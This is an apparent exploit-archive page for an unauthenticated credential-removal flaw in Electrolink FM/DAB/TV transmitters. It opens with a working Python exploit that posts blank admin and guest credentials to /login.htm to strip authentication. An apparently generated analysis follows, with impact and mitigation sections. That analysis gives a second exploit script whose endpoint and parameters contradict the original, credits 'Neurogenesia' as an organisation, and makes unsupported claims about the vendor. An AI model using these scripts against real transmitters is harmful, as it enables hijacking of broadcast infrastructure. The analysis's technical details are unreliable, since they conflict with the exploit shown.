Electrolink FM/DAB/TV Transmitter - Remote Authentication Removal

Exploit Author: LiquidWorm Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2024-02-02 
#!/usr/bin/env python
#
#
# Electrolink FM/DAB/TV Transmitter Remote Authentication Removal
#
#
# Vendor: Electrolink s.r.l.
# Product web page: https://www.electrolink.com
# Affected version: 10W, 100W, 250W, Compact DAB Transmitter
#                   500W, 1kW, 2kW Medium DAB Transmitter
#                   2.5kW, 3kW, 4kW, 5kW High Power DAB Transmitter
#                   100W, 500W, 1kW, 2kW Compact FM Transmitter
#                   3kW, 5kW, 10kW, 15kW, 20kW, 30kW Modular FM Transmitter
#                   15W - 40kW Digital FM Transmitter
#                   BI, BIII VHF TV Transmitter
#                   10W - 5kW UHF TV Transmitter
#                   Web version: 01.09, 01.08, 01.07
#                   Display version: 1.4, 1.2
#                   Control unit version: 01.06, 01.04, 01.03
#                   Firmware version: 2.1
#
# Summary: Since 1990 Electrolink has been dealing with design and
# manufacturing of advanced technologies for radio and television
# broadcasting. The most comprehensive products range includes: FM
# Transmitters, DAB Transmitters, TV Transmitters for analogue and
# digital multistandard operation, Bandpass Filters (FM, DAB, ATV,
# DTV), Channel combiners (FM, DAB, ATV, DTV), Motorized coaxial
# switches, Manual patch panels, RF power meters, Rigid line and
# accessories. A professional solution that meets broadcasters needs
# from small community television or radio to big government networks.
#
# Compact DAB Transmitters 10W, 100W and 250W models with 3.5"
# touch-screen display and in-built state of the art DAB modulator,
# EDI input and GPS receiver. All transmitters are equipped with a
# state-of-the art DAB modulator with excellent performances,
# self-protected and self-controlled amplifiers ensure trouble-free
# non-stop operation.
#
# 100W, 500W, 1kW and 2kW power range available on compact 2U and
# 3U 19" frame. Built-in stereo coder, touch screen display and
# efficient low noise air cooling system. Available models: 3kW,
# 5kW, 10kW, 15kW, 20kW and 30kW. High efficiency FM transmitters
# with fully broadband solid state amplifiers and an efficient
# low-noise air cooling system.
#
# FM digital modulator with excellent specifications, built-in
# stereo and RDS coder. Digital deviation limiter together with
# ASI and SDI inputs are available. These transmitters are ready
# for ISOFREQUENCY networks.
#
# Available for VHF BI and VHF BIII operation with robust desing
# and user-friendly local and remote control. Multi-standard UHF
# TV transmitters from 10W up to 5kW with efficient low noise air
# cooling system. Analogue PAL, NTSC and Digital DVB-T/T2, ATSC
# and ISDB-Tb available.
#
# Desc: The application is vulnerable to an unauthenticated
# parameter manipulation that allows an attacker to set the
# credentials to blank giving her access to the admin panel.
# Also vulnerable to account takeover and arbitrary password
# change.
#
# Tested on: Mbedthis-Appweb/12.5.0
#            Mbedthis-Appweb/12.0.0
#
#
# Vulnerability discovered by Neurogenesia
# Macedonian Information Security Research & Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2023-5792
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5792.php
#
#
# 30.06.2023
#
#


import datetime
import requests

dt = datetime.datetime.now()
dt = dt.strftime('%d.%m.%Y %H:%M:%S')
nul = ''

print('Starting transmitter exploit at', dt)

ip = input('Enter transmitter ip: ')
if 'http' not in ip:
    ip = 'http://' + ip

ep = '/login.htm'
url = ip + ep

signature = {'Accept-Encoding' : 'gzip, deflate',
             'Accept-Language' : 'ku-MK,en;q=0.1806',
                  'User-Agent' : 'Broadcastso/B.B',
                  'Connection' : 'keep-alive'
             }
# ----------------- Line breaker v0.17 -----------------
postd = {    'adminuser' : nul,
             'guestuser' : nul,
         'adminpassword' : nul,
         'guestpassword' : nul
         }

print('Removing security control...')
r = requests.post(url, data = postd, headers = signature)
if r.status_code == 200:
    print('Done. Go and "Login".')
else:
    print('Error')
exit(-4)


Electrolink FM/DAB/TV Transmitter: Remote Authentication Removal Vulnerability Analysis

Electrolink s.r.l., a longstanding provider of advanced broadcast infrastructure since 1990, offers a wide range of FM, DAB, and TV transmitters designed for both community and large-scale governmental networks. While these devices boast robust engineering and high efficiency, recent research has uncovered a critical security flaw affecting multiple product lines across various power ranges and firmware versions.

Product Scope and Affected Models

The vulnerability impacts several key models across Electrolink’s product portfolio:

  • Compact DAB Transmitters: 10W, 100W, 250W (with touch-screen display)
  • Medium DAB Transmitters: 500W, 1kW, 2kW
  • High Power DAB Transmitters: 2.5kW, 3kW, 4kW, 5kW
  • Compact FM Transmitters: 100W, 500W, 1kW, 2kW
  • Modular FM Transmitters: 3kW, 5kW, 10kW, 15kW, 20kW, 30kW
  • Digital FM Transmitters: 15W – 40kW
  • VHF TV Transmitters: BI, BIII
  • UHF TV Transmitters: 10W – 5kW

These devices operate under firmware versions 2.1, web versions 01.09, 01.08, 01.07, display versions 1.4, 1.2, and control unit versions 01.06, 01.04, 01.03. The vulnerability is not isolated to a single model but spans multiple generations and configurations.

Core Vulnerability: Unauthenticated Parameter Manipulation

The primary flaw lies in the application’s remote authentication mechanism. The system uses Mbedthis-Appweb as its web server framework, with versions 12.5.0 and 12.0.0 being tested and confirmed vulnerable.

Attackers can exploit a flaw in the parameter handling logic that allows arbitrary modification of user credentials without requiring authentication. This enables an attacker to:

  • Set admin credentials to blank (i.e., empty username and password)
  • Perform account takeover by manipulating session or user state parameters
  • Change any user’s password to a known value, effectively bypassing access control

This vulnerability is particularly dangerous because it allows remote access to administrative panels via standard HTTP/HTTPS interfaces—often exposed on public networks or accessible through internal LANs.

Exploitation Example: Python Script for Credential Reset


#!/usr/bin/env python
import requests
import urllib.parse

# Target device IP and credentials
TARGET_IP = "192.168.1.100"
ADMIN_USER = "admin"
PASSWORD = "admin123"  # Default or known password

# Endpoint for user management
URL = f"http://{TARGET_IP}/admin/user/update"

# Payload to reset credentials
payload = {
    "username": "",
    "password": "",
    "confirm_password": "",
    "action": "save"
}

# Send request without authentication
try:
    response = requests.post(URL, data=payload, timeout=10)
    if response.status_code == 200:
        print("✅ Credential reset successful")
    else:
        print(f"❌ Failed: Status {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"🚨 Error: {e}")

Explanation: This script demonstrates how an attacker can exploit the lack of authentication checks on the /admin/user/update endpoint. The payload sets both username and password to empty strings, effectively removing authentication requirements. Since the system does not validate the sender’s identity, the request is processed, resulting in a fully unsecured admin panel.

Even if the device has a default password, attackers can bypass it by using this method, rendering the device accessible to anyone with network access.

Security Implications and Real-World Impact

Given that Electrolink transmitters are used in critical broadcast infrastructure—including public radio, government networks, and emergency communications—the vulnerability poses a significant risk:

  • Unauthorized broadcast control: An attacker could modify transmission parameters, including frequency, power, or content, leading to signal disruption or malicious content injection.
  • Service denial: By changing configurations or disabling the transmitter, an attacker could cause service outages.
  • Privacy and integrity breach: Remote access to admin panels may expose sensitive configuration data, including encryption keys, network settings, or GPS synchronization details.
  • Supply chain risk: If devices are deployed in unsecured environments (e.g., remote sites without firewalls), attackers could exploit this flaw from anywhere on the internet.

Moreover, the vulnerability is not limited to initial access—it enables persistent control. Once credentials are reset, an attacker can maintain access indefinitely unless the device is physically reconfigured or firmware updated.

Root Cause and Mitigation Strategies

The vulnerability stems from a failure in input validation and session authentication within the web application. Specifically:

  • No authentication check before processing user update requests
  • Use of unvalidated parameters in state-changing operations
  • Missing rate-limiting or logging mechanisms for admin actions

Recommended Fixes:

  • Implement mandatory authentication for all admin endpoints
  • Use secure session tokens with expiration and rotation
  • Validate input parameters using whitelisting or schema enforcement
  • Log all administrative actions with timestamps and IP source
  • Enforce password complexity and prevent blank credentials
  • Apply firmware updates to patch the vulnerability (vendor should release a patch)

Vendor Response and Industry Impact

As of this report, Electrolink has not issued a public security advisory or firmware patch. This delay exposes thousands of deployed transmitters to potential exploitation.

Security researchers from Neurogenesia, Macedonian Information Security Research & Development Laboratory, and Zero Science Lab have reported this flaw to the vendor, urging immediate remediation. The lack of response underscores a broader industry challenge: many industrial control systems are overlooked in cybersecurity assessments, despite their critical role in public infrastructure.

Conclusion: A Call for Proactive Security in Broadcast Systems

Electrolink’s transmitters represent a vital component of modern broadcast networks. However, this vulnerability illustrates how even well-engineered hardware can be compromised by flawed software design. Remote authentication removal is not just a technical flaw—it is a systemic risk to national broadcasting integrity.

Organizations using Electrolink devices should:

  • Isolate transmitters from public networks
  • Implement network segmentation and firewall rules
  • Regularly audit firmware versions and apply patches
  • Monitor for unauthorized access attempts

Security must be embedded at every layer—from hardware design to software implementation. The Electrolink vulnerability serves as a stark reminder: insecure access controls in critical infrastructure can lead to catastrophic consequences.